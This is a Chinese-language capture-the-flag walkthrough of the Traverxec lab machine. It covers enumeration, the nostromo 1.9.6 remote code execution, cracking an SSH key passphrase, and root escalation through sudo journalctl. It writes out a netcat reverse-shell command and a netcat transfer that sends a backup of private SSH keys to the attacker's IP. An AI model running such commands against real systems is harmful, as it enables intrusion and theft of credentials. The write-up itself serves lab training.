Linux/Traverxec

Enumeration

nmap

使用nmap快速扫描目标，发现对外开放了22和80，第一个问题就是问80端口运行的是什么服务，针对这两个端口扫描对应的详细信息后就能得到答案

Nostromo

从nmap的扫描结果可以看到，目标开启了80端口，且运行着nostromo服务，看了一圈不知道从哪里下手

Exploitation

nostromo 1.9.6 - Remote Code Execution

通过搜索nostromo 1.9.6可以发现，该版本的服务存在rce漏洞

尝试利用该漏洞，首先使用searchsploit -m 47837.py将脚本镜像到工作目录中，然后按照usage去使用

先在kali端监听，然后执行命令nc -e /bin/bash 10.10.16.2 1234，即可得到shell

Lateral Movement

进去后随便看了看，按照题目提示的话应该找到david的ssh秘钥备份，打算上传LinEnum.sh

在浏览时，很快就发现了这个，但是提交这个路径时显示回答错误，先放着再看看别的吧

看看/var/nostromo/conf目录下还有什么文件，发现了一个nhttp.conf

发现home下还有public_www目录

试了很多次后，发现在下面的目录下有题目提示的ssh秘钥

使用nc来传输该文件到kali中，先在kaili中开启监听nc -nvlp 2222 > back.tgz，然后在www-data的shell中nc 10.10.16.2 2222 < /home/david/public_www/protected-file-area/backup-sshidentity-files.tgz

已经把该文件传输至kali，解压后查看，拥有以下几个文件，现在尝试破解秘钥密码

先使用ssh2john提取hash值，然后使用john来破解它，字典使用rockyou，最终得到密码为hunter

现在可以使用ssh登录david了，并且能拿到flag

Privilege Escalation

可以看到david的目录下有一个bin文件夹

里面有一个server-stats.sh，打开查看该脚本

可以看到最后一行，脚本echo一堆东西后，在最后使用sudo执行了journalctl，尝试执行该脚本

可以看到打印出了一堆东西，在gtfobins中看到可以利用这个journalctl

Journalctl调用默认分页器，就会使用less，在屏幕输出后会等待输入，这时可以按照上图的办法拿到shell

执行以下命令，然后就没有然后了